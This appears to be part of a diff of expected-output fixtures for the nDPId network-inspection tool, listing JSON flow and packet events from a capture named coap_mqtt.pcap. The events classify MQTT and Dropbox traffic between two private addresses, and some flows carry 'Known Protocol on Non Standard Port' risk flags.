00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqf0dAAEAGyc\/AqDhlwKg4AURd0RObj0l3TWIKIlAYAOXx0wAA0AA="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455907258532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907258532,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELtAAIAG+F3AqDgBwKg4ZdETRF1NYgoim49JeVAQAQBrHwAAAAAAAAAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907267002,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1455907267002,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAA0ELxAAIAG+FDAqDgBwKg4ZdEYRF3fAvFmAAAAAIACIAB3eQAAAgQFtAEDAwgBAQQC"}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnAERyCAAnmO\/hCABFAAA0AABAAEAGSQ3AqDhlwKg4AURd0RiuSO3C3wLxZ4ASchDx3QAAAgQFtAEBBAIBAwMH"}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoEL1AAIAG+FvAqDgBwKg4ZdEYRF3fAvFnrkjtw1AQAQA7MAAAAAAAAAAA"}
00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1455907267002,"flow_last_seen":1455907267007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1455907267007,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455907258332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELpAAIAG+FzAqDgBwKg4ZdETRF1NYgogm49Jd1AYAQCrGAAAwAAAAAAA"}
00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455907258332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqf0dAAEAGyc\/AqDhlwKg4AURd0RObj0l3TWIKIlAYAOXx0wAA0AA="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455907258532,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907258532,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELtAAIAG+F3AqDgBwKg4ZdETRF1NYgoim49JeVAQAQBrHwAAAAAAAAAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907267002,"flow_last_seen":1455907267002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1455907267002,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455907267002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAA0ELxAAIAG+FDAqDgBwKg4ZdEYRF3fAvFmAAAAAIACIAB3eQAAAgQFtAEDAwgBAQQC"}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455907267002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnAERyCAAnmO\/hCABFAAA0AABAAEAGSQ3AqDhlwKg4AURd0RiuSO3C3wLxZ4ASchDx3QAAAgQFtAEBBAIBAwMH"}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455907267002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoEL1AAIAG+FvAqDgBwKg4ZdEYRF3fAvFnrkjtw1AQAQA7MAAAAAAAAAAA"}
00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1455907267002,"flow_last_seen":1455907267007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1455907267007,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455907271481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1455907271481,"pkt":"CAAnmO\/hCAAnAERyCABFAAB8EMQAAIARN\/bAqDgBwKg4ZcSHRFwAaLRJQwM1AW9STXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMSBFRVQgMjAxNiJ9"}
00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAB+1KdAAEAGdBvAqDhlwKg4AURd0RSW3pIhxZi6gFAYAOXyJwAAMlQACEJ1czE3Q21kAAJ7Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="}
00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7560000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455907271483,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAB+1KdAAEAGdBvAqDhlwKg4AURd0RSW3pIhxZi6gFAYAOXyJwAAMlQACEJ1czE3Q21kAAJ7Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="}
00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7560000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455907271483,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAAvXYVAAEAR64HAqDhlwKg4AURcxIcAG\/HjY0Q1AW9STYsvci9CdXMxN0NtZA=="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455907271485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1455907271485,"pkt":"CAAnmO\/hCAAnAERyCABFAAAsEMdAAIAG+E3AqDgBwKg4ZdEURF3FmLqAlt6Sd1AYAP++LAAAQAIAAgAA"}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455907271522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1455907271522,"pkt":"CAAnAERyCAAnmO\/hCABFAAAo1KhAAEAGdHDAqDhlwKg4AURd0RSW3pJ3xZi6hFAQAOXx0QAA"}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455907271485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1455907271485,"pkt":"CAAnmO\/hCAAnAERyCABFAAAsEMdAAIAG+E3AqDgBwKg4ZdEURF3FmLqAlt6Sd1AYAP++LAAAQAIAAgAA"}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455907271522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1455907271522,"pkt":"CAAnAERyCAAnmO\/hCABFAAAo1KhAAEAGdHDAqDhlwKg4AURd0RSW3pJ3xZi6hFAQAOXx0QAA"}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1455907271585,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907271585,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EM0AAIARN+7AqDgBwKg4ZcSHRFwAZzJrQgM1Anj4ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":180000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455907272856,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907272856,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EWkAAIARN1LAqDgBwKg4ZcSORFwAZ7scQgMdqQeYckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjEyIEVFVCAyMDE2In0="}
@@ -84,10 +84,10 @@
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1922,"flow_first_seen":1455907243976,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1926,"flow_first_seen":1455907258332,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1919,"flow_first_seen":1455907271483,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1928,"flow_first_seen":1455907267002,"flow_last_seen":1455907286845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61855,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1922,"flow_first_seen":1455907243976,"flow_last_seen":1455907286855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
